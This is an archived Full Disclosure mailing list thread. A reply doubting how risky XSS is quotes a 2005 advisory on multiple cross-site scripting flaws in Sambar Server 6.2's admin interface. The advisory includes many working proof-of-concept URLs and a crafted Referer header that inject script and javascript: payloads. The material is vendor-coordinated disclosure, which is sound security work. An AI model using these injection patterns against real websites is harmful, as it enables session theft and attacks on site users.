Full Disclosure mailing list archives
Re: XSS in Sambar Server version 6.2
From: Daniel <deeper () gmail com>
Date: Tue, 24 May 2005 15:44:39 +0100
"A user can input a specially crafted script that when rendered by the application..." Hopefully you can explain: - Is the user required to be logged in first, or can this be done unauthenticated - Are you able to steal any aspect of the session management logic using this method - Are you able to, in any way, gain access to the sambar installation using this technique? I have issues with any XSS security research being more than a low risk, unless you can modify the logic of the application or gain access to the platform in question. Automated scanning tools love XSS issues as they are easy to find, but in reality bloody hard to exploit (wow, i have made a jscript window popup) ps, its not a personal attack, just me failing to understand the logic of XSS attacks (hell its like 1999 when responding to ICMP packets was seen as a risk) On 5/23/05, jamie fisher <contact_jamie_fisher () yahoo co uk> wrote:
- Sambar - AFFECTED PRODUCTS: ================== Sambar Server 6.2 http://www.sambar.com/ OVERVIEW: ========= Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server. HISTORY: ======== 17th April 2005 - First discovered 17th April 2005 - Contacted vendor 20th April 2005 - Vendor reply 20th May 2005 - Patch available DETAILS: ======== Multiple XSS found in the administrative interface. In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site. ISSUE: ====== Crafted input of causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected the page served by the application. EXAMPLE: ======== Standard XSS within the /search directory: ========================================== 1. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name 2. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name 3. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name 4. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name 5. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name 6. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name 7. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name 8. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name 9. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name 10. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name 11. http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name 12. http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name Standard XSS within the /session directory: =========================================== 1. http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script> 2. http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script> 3. http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22> HTML XSS within the /search directory: ====================================== 1. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name 2. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name 3. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name 4. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63; %26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name 5. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name 6. http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name No chevron '<' '>' XSS within the /search directory: ==================================================== 1. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name 2. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name 3. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name 4. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name 5. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name 6. http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name Escaping from HTML XSS within the /session directory: ==================================================== 1. http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script> Including XSS within referrer: ============================== 1. GET /CheckingXssInReferer.html HTTP/1.0 Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false Host: 192.168.0.5 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Referer: "></a><script>alert('XSS')</script> SOLUTION: ========= Sambar Server has been contacted and has released patches. Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :) REFERENCE: ========== http://www.sambar.com/security.htm http://homepage.hispeed.ch/spamtrap/sambar62p.exe CREDITS: ======== Tod Sambar for understanding the issue and resolving in a timely manner. This vulnerability was discovered and researched by Jamie Fisher mail: contact_jamie_fisher[at]yahoo.co.uk ________________________________ Yahoo! Messenger NEW - crystal clear PC to PC calling worldwide with voicemail _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS in Sambar Server version 6.2 jamie fisher (May 23)
- Re: XSS in Sambar Server version 6.2 Daniel (May 24)
- Re: XSS in Sambar Server version 6.2 jamie fisher (May 24)
- Re: XSS in Sambar Server version 6.2 Daniel (May 25)
- Re: XSS in Sambar Server version 6.2 jamie fisher (May 24)
- Re: XSS in Sambar Server version 6.2 Daniel (May 24)